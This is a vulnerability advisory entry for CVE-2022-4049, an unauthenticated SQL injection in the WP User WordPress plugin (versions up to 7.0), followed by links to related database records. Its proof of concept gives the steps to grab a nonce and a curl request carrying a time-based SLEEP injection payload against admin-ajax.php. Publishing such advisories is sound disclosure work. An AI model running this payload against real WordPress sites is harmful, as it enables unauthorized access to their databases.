Lucene search
CydaveWPEX-ID:9B0781E2-AD62-4308-BAFC-D45B9A2472BEHistoryDec 09, 2022 - 12:00 a.m.
WP User <= 7.0 - Unauthenticated SQLi
2022-12-0900:00:00
cydave
155
wordpress
unauthenticated
sql injection
0.054 Low
EPSS
Percentile
93.2%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. As an unauthenticated user, visit the "Sign Up" page (by default, this is /?page_id=5, or /user/)
2. Extract the "wpuser_update_setting" nonce (CTRL+F for "wpuser_update_setting")
3. Invoke the following curl command, with the just extracted nonce, to induce a 5 seconds sleep:
time curl https://example.com/wp-admin/admin-ajax.php \
--data 'action=wpuser_group_action&group_action=x&wpuser_update_setting=<NONCE>&id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))khkM)'Related
cvelist
cvelist
CVE-2022-4049 WP User <= 7.0 - Unauthenticated SQLi
2023-01-02 21:49:14
prion
prion
Sql injection
2023-01-02 22:15:00
nvd
nvd
CVE-2022-4049
2023-01-02 22:15:15
cve
cve
CVE-2022-4049
2023-01-02 22:15:15
wpvulndb
wpvulndb
WP User <= 7.0 - Unauthenticated SQLi
2022-12-09 00:00:00
nuclei
nuclei
WP User <= 7.0 - Unauthenticated SQLi
2023-10-17 07:20:28